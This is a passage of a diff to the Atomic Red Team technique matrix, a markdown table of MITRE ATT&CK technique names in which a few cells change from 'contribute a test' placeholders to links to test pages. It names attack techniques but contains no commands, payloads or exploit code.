Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -26,7 +26,7 @@
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  |  | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
+|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -6,7 +6,7 @@
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -23,21 +23,21 @@
 | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Network Sniffing](../../T1040/T1040.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+|  | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
